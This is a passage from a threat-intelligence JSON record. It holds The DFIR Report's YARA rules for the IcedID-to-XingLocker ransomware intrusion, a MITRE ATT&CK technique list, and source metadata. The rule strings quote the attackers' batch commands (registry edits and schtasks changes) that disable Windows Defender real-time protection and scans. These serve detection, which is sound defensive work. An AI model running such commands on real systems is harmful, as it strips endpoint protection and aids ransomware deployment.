\\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullw\r\n $s11 = \"reg delete \\\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\StartupApproved\\\\Run\\\" /v \\\"Windo\r\n $s12 = \"rem 0 - Disable Logging\" fullword ascii\r\n $s13 = \"rem Run \\\"Disable WD.bat\\\" again to disable WD services\" fullword ascii\r\n $s14 = \"schtasks /Change /TN \\\"Microsoft\\\\Windows\\\\ExploitGuard\\\\ExploitGuard MDM policy Refresh\\\" /Disable\" fullwor\r\n $s15 = \"reg delete \\\"HKCR\\\\Directory\\\\shellex\\\\ContextMenuHandlers\\\\EPP\\\" /f\" fullword ascii\r\n $s16 = \"reg delete \\\"HKCR\\\\*\\\\shellex\\\\ContextMenuHandlers\\\\EPP\\\" /f\" fullword ascii\r\n $s17 = \"reg delete \\\"HKCR\\\\Drive\\\\shellex\\\\ContextMenuHandlers\\\\EPP\\\" /f\" fullword ascii\r\n $s18 = \"schtasks /Change /TN \\\"Microsoft\\\\Windows\\\\Windows Defender\\\\Windows Defender Scheduled Scan\\\" /Disable\" ful\r\n $s19 = \"schtasks /Change /TN \\\"Microsoft\\\\Windows\\\\Windows Defender\\\\Windows Defender Cleanup\\\" /Disable\" fullword a\r\n $s20 = \"schtasks /Change /TN \\\"Microsoft\\\\Windows\\\\Windows Defender\\\\Windows Defender Verification\\\" /Disable\" fullw\r\n condition:\r\n ( uint16(0) == 0x6540 and filesize \u003c 10KB and ( 8 of them )\r\n ) or ( all of them )\r\n}\r\nrule fed3_fed1_5 {\r\n meta:\r\n description = \"for files: fed3.bat, fed1.bat\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-09-14\"\r\n hash1 = \"8dced0ed6cba8f97c0b01f59e063df6be8214a1bd510e4774ef7f30c78875f4e\"\r\n hash2 = \"81a1247465ed4b6a44bd5b81437024469147b75fe4cb16dc4d2f7b912463bf12\"\r\n strings:\r\n $s1 = \"rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference\" fullword ascii\r\n $s2 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\" /v \\\"SpynetReporting\\\" /t REG_DWORD\r\n $s3 = \"rem 
reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SecurityHealthService\\\" /v \\\"Start\\\" /t REG_DWORD /d\r\n $s4 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\" /v \\\"DisableAntiSpyware\\\" /t REG_DWORD /d \\\r\n $s5 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\" /v \\\"SubmitSamplesConsent\\\" /t REG_\r\n $s6 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\" /v \\\"DisableBlockAtFirstSeen\\\" /t R\r\n $s7 = \"rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!\" fullword ascii\r\n $s8 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableScanOnRea\r\n $s9 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableScanOnRea\r\n $s10 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableBehavior\r\n $s11 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableBehavior\r\n $s12 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableOnAccess\r\n $s13 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableRealtime\r\n $s14 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableIOAVProt\r\n $s15 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableRealtime\r\n $s16 = \"rem 1 - Disable Real-time protection\" fullword ascii\r\n $s17 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\" /v \\\"DisableAntiVirus\\\" /t REG_DWORD /d \\\"\r\n $s18 = \"reg add 
\\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableOnAccess\r\n $s19 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\MpEngine\\\" /v \\\"MpEnablePus\\\" /t REG_DWORD\r\n $s20 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableIOAVProt\r\n condition:\r\n ( uint16(0) == 0x6540 and filesize \u003c 10KB and ( 8 of them )\r\n ) or ( all of them )\r\n}\r\nrule spoolsv_kaslose_7 {\r\n meta:\r\n description = \"for files: spoolsv.exe, kaslose.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-09-14\"\r\n hash1 = \"0d575c22dfd30ca58f86e4cf3346180f2a841d2105a3dacfe298f9c7a22049a0\"\r\n hash2 = \"320296ea54f7e957f4fc8d78ec0c1658d1c04a22110f9ddffa6e5cb633a1679c\"\r\n strings:\r\n $s1 = \"Protect End\" fullword ascii\r\n $s2 = \"ctsTpiHgtme0JSV3\" fullword ascii\r\n $s3 = \"Protect Begin\" fullword ascii\r\n $s4 = \"pZs67CJpQCgMm8L4\" fullword ascii\r\n $s5 = \"6V7e7z7\" fullword ascii\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize \u003c 2000KB and ( all of them )\r\n ) or ( all of them )\r\n}\r\nrule xinglocker_update64 {\r\n meta:\r\n description = \"xinglocker - file update64.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-10-07\"\r\n hash1 = \"47ff886d229a013d6e73d660a395f7b8e285342195680083eb96d64c052dd5f0\"\r\n strings:\r\n $s1 = \"\u003ej=nAy;j;l;l;m;n;k;p;q;rFpFo;u;vBo;x;y\u003cj\u003ck\u003cl\u003cm\u003cn@o\u003cp\u003cq\u003cr\u003cs\u003ct\u003cu\u003cv\u003cw\u003cx\u003cy=j=k=l=m=n=o=p=q=r=s=t=u=v=w=x=y\u003ej\u003ek\u003el\u003e\r\n $s2 = \"?lAu\u003ewGmCkCl;p?nFkCyGy;mCl\u003eoDx9sGxCxCyHr\u003ct?oHu\u003cy@r=sClCkHvDtDuHn\u003cp@m=jFoHkAqEmEnAw=wEvAo=l9v@kEyEwExEy\u003es\u003elBtF\r\n $s3 = \"HnGtDyEpExFjAmEoAoFkEyEkEoEyAqAvErFpExFwFrFvFpFjBoEyFrEwEuBtFyFwEsFyBmGjCoCwDnCtCsCsCpCvCvCxGuDyCrCjDvDsCoDuC\r\n $s4 = 
\"Bw@oBrGr;vDqBoEpCoCp\u003eqGvCrBq?s\u003eoCwCxGm\u003cu@pHm\u003cr@u\u003ewCoAuDrDsAs@u\u003eoFtDyDyEj=l?qEyEpEoEpEq\u003cy=yElEuExEwExEuFjFkCqE\r\n $s5 = \"BwBx;pCmCkClCm=vAkCnCqCr;l?vGm;w?sFpCwDjDkGwGwGyGr@o@u@nHsGsHm\u003cy\u003ekGxHq=u:rAt=xFk\u003csBkEqEr@jEsEuEvEw;p\u003coFkFkFlG\r\n $s6 = \"Bo\u003ewGl9j9qGlGmGnBkEmFn\u003ctCk?k;jCr?jCvGx9yGnEwDkHnHoDt@vHw;s:vHuHvDo@o\u003cn=rAt:qDwGl9o9pGy\u003ckFlHoHn=nApFs=qBuFtHt9\r\n $s7 = \":oFoFlFj?k?l?m;vGx@qBr\u003ct@sAk?k;nGpGuFy@j@k@l\u003ctHw@lHwDn\u003cnHnGp\u003eyHv@v@x@yEs9tFsEmEw9xHoEyEk9l?sEtFmEvFjExEvExEy\u003e\r\n $s8 = \"FpDxFq?k=kCnGy;sCj:w\u003et\u003eq\u003epGpCr?nGk;qFuBnBsAk?kHj\u003cvElBmBrAt@m=nCsAkHkDyEjAs=uAn\u003cnAw=m9qDvCk\u003co9wAn=x9sAy\u003em;yFjC\r\n $s9 = \"FwFxBqEu;p\u003eu:v:u:t:sCyFm;rBw\u003cr?yBpExGyAo;w=tHlHnHoHpDy@mCoFxEuDn@x\u003ctFy\u003eyElExEyEr=wAy\u003eu;v9k\u003ew=mAyGk;x=pBuGs\u003etB\r\n $s10 = \":w:x\u003eqCoFx;wCqGr;o;p;q?jClHo?mFu?x@xFnEyExEw=q=l@k9y=n\u003cv=y=t@m9o=x?x=u;t9w@u\u003cj9n\u003ck;l;k9v@j\u003cs@m\u003cr:j9tEq;n@o;l\r\n $s11 = \"HoHuHkAjFkFjEpFqFpApAoGvEpFwEoEjElEyEuBjGoFwEkBnHqEnFrEyEtFyEsBvHyEuFkCnCwCqGkGrGoCyCsDuDwCuCqCjGwCyCkDnHkCj\r\n $s12 = \"EsHv:y;j;k;l;m;nEyEn;q;r;s;t;u;vFmEv;y\u003cj\u003ck\u003cl\u003cm\u003cn?qFn\u003cq\u003cr\u003cs\u003ct\u003cu\u003cv=yFy\u003cy=j=k=l=m=nEwCq=q=r=s=t=u=vFqCy=y\u003ej\u003ek\u003el\r\n $s13 = \"ByBwByCkCqCoCqCkCyCwCyCkCqCoCqCkCxCxCxDlDpDpDpDlDxDxDxDlDpDpDpDlDyDxDyEjEkElEmEnEoEpEqErEsEtEuEvEyExEyFjFkFl\r\n $s14 = \"GoHuByCjCkClCmCnErFyFnFsEoExApElFsAjEtErFnDlDmDnFrEyEnEsFoFxBpFmEwEtBkCoDsCqEmEnCkCnClCpCxHyHuGlCrDpCtFjFkFl\r\n $s15 = \"CqBxBpCjAnClFjCnCrCpCwCrCsCtCuCvGxCxGlDjHoDlHyDnHvDpHsDrHvDtAkDvDnDxBtEjDlElExEnEyEpEqErEsEtEuEvBkExApFjAkFl\r\n $s16 = \"\u003ep:yGp?l?k?l?m;k\u003epCp\u003enDtBp@yBw;u?w?xGtDj9o=r\u003cuHy@x\u003ctHtHn\u003ewHt@t@v@w\u003cpHvGnCoClAmEv9rFlCmDrEr\u003clDlAwAwAx@jAoBsFu\r\n 
$s17 = \";oGs;k\u003cyDuAw@xAjCmGx\u003ej=uCpHk\u003enGnAp@nGq?k\u003etHtDj?xHw@q\u003evDk\u003cv?kEyDq\u003cp@w=vArExGr9m\u003cqEtBr\u003cyAj=lEy?o@jEwExAq\u003eo:kCp\r\n $s18 = \";k\u003ct\u003ey?j;wGy;j?oFy?x?q?r?s;lGjCnBl@u:w:n@k@l\u003cuHyCw\u003cxHlDr@pHxFm@v@w@x\u003cq9uEwCpDuEr9rEtCmDvEo9k=uEn9jFtCuCj?xAq\r\n $s19 = \"HwByAjCkDyCmDyDuDr;o;u;nCk?mDqErGoCp?pAvFoGlCpDv@r\u003etFmHr9o9o9nDn@v:lHy9o9k9l=uAs\u003ejGpDx9v9r9t9uHm:rDo;k:j:kBs\r\n $s20 = \"AwBp\u003ev;nCkDw;j;rCw?yDuEvGkCl?lAjEsHxCq@sAoFpGuCmDnCjDpCyDk@s:qDvDo@wEl\u003cr\u003co9l9m9n=wAwHx@w9n=lAp9k;k\u003ct9y:jGx9q\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 500KB and\r\n ( pe.imphash() == \"309f189ae3d618bfd1e08a8538aea73a\" and ( pe.exports(\"MkozycymwrxdxsUdddknsoskqjj\") and pe.exports(\r\n}\r\nMITRE\r\nOS Credential Dumping – T1003\r\nSMB/Windows Admin Shares – T1021.002\r\nSystem Owner/User Discovery – T1033\r\nNetwork Service Scanning – T1046\r\nWindows Management Instrumentation – T1047\r\nScheduled Task/Job – T1053\r\nProcess Injection – T1055\r\nPowerShell – T1059.001\r\nDomain Groups – T1069.002\r\nFile and Directory Discovery – T1083\r\nAccess Token Manipulation – T1134\r\nNetwork Share Discovery – T1135\r\nDomain Trust Discovery – T1482\r\nData Encrypted for Impact – T1486\r\nSecurity Software Discovery – T1518.001\r\nDisable or Modify Tools – T1562.001\r\nSource: https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/"
	],
	"report_names": [
		"icedid-to-xinglocker-ransomware-in-24-hours"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434481,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9c516fb58cb70db768fb119f3823c4b83909ac0a.pdf",
		"text": "https://archive.orkl.eu/9c516fb58cb70db768fb119f3823c4b83909ac0a.txt",
		"img": "https://archive.orkl.eu/9c516fb58cb70db768fb119f3823c4b83909ac0a.jpg"
	}
}